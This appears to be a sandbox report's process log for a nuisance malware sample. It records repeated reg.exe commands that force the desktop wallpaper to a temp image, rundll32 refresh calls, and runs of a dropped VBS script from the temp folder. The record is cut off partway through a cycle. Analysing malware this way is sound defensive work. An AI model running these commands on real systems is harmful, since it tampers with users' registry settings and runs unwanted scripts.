reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
